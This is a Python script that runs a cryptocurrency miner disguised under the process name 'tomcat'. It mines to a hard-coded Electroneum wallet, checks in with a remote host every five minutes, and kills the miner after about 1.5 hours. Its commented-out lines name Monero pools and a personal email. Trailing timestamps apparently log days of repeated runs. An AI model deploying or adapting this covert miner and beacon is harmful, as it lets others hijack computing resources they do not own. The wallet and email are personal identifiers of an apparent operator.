import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:53:04.012338
#2018-02-17 17:42:03.974723
#2018-02-17 19:31:01.398967
#2018-02-17 21:20:02.187542
#2018-02-17 23:03:05.110348
#2018-02-18 00:50:01.483219
#2018-02-18 02:37:05.295309
#2018-02-18 04:24:04.946861
#2018-02-18 06:16:07.851737
#2018-02-18 08:06:05.737224
#2018-02-18 09:53:04.157948
#2018-02-18 11:40:05.967610
#2018-02-18 13:25:08.153336
#2018-02-18 15:15:03.239424
#2018-02-18 17:03:07.047067
#2018-02-18 18:50:05.599130
#2018-02-18 20:37:03.651753
#2018-02-18 22:23:03.968521
#2018-02-19 00:12:05.919683
#2018-02-19 01:59:01.776595
#2018-02-19 03:45:09.533048
#2018-02-19 05:31:06.046935
#2018-02-19 07:19:06.165093
#2018-02-19 09:08:06.235043
#2018-02-19 10:56:07.244535
#2018-02-19 12:45:04.451006
#2018-02-19 14:32:04.505990
#2018-02-19 16:21:01.476676
#2018-02-19 18:08:01.695851
#2018-02-19 19:55:05.201286
#2018-02-19 21:44:04.042478
#2018-02-19 23:31:05.338645
#2018-02-20 01:17:06.248085
#2018-02-20 03:07:07.992783
#2018-02-20 04:54:05.167887
#2018-02-20 06:37:02.114091
#2018-02-20 08:22:03.576782
#2018-02-20 10:07:01.821901
#2018-02-20 11:51:04.526590
#2018-02-20 13:39:06.612480
#2018-02-20 15:22:08.395974
#2018-02-20 17:08:01.384846
#2018-02-20 18:56:01.580887
#2018-02-20 20:46:06.470554
#2018-02-20 22:31:05.452941
#2018-02-21 00:12:06.433718
#2018-02-21 01:57:07.693365
#2018-02-21 03:45:05.373779
#2018-02-21 05:35:03.863299
#2018-02-21 07:24:04.268680
#2018-02-21 09:08:07.756890
#2018-02-21 10:57:08.126074
#2018-02-21 12:46:01.252176
#2018-02-21 14:34:10.518725
#2018-02-21 16:21:01.439115
#2018-02-21 18:12:08.198852
#2018-02-21 19:59:04.223339
#2018-02-21 21:46:10.137981
#2018-02-21 23:34:03.464986
#2018-02-22 01:22:07.175079
#2018-02-22 03:12:04.417521
#2018-02-22 04:58:05.881351
#2018-02-22 06:43:08.165203
#2018-02-22 08:32:04.903043
#2018-02-22 10:18:06.041090
#2018-02-22 12:03:08.631541
#2018-02-22 13:48:06.506110
#2018-02-22 15:38:04.836994
#2018-02-22 17:23:08.771674
#2018-02-22 19:12:08.455149
#2018-02-22 21:05:01.500909
#2018-02-22 22:49:08.894904
#2018-02-23 00:36:07.831787
#2018-02-23 02:21:05.928178
#2018-02-23 04:09:03.994592
#2018-02-23 05:53:04.122731
#2018-02-23 07:43:05.160723
#2018-02-23 09:47:01.428175
#2018-02-23 11:53:05.507136
#2018-02-23 13:43:08.523123
#2018-02-23 15:33:06.391057
#2018-02-23 17:23:01.547123
#2018-02-23 19:09:07.127925
#2018-02-23 20:54:05.473361
#2018-02-23 22:40:08.570328
#2018-02-24 00:28:04.863947
#2018-02-24 02:20:09.456474
#2018-02-24 04:09:05.679287
#2018-02-24 05:57:07.079555
#2018-02-24 07:46:06.533356
#2018-02-24 09:31:06.659009
#2018-02-24 11:26:01.983058
#2018-02-24 13:15:06.315169
#2018-02-24 15:06:06.390999
#2018-02-24 16:55:05.188885
#2018-02-24 18:43:06.415010
#2018-02-24 20:33:04.775317
#2018-02-24 22:34:01.764021
#2018-02-25 02:51:03.891982
#2018-02-25 06:26:01.605316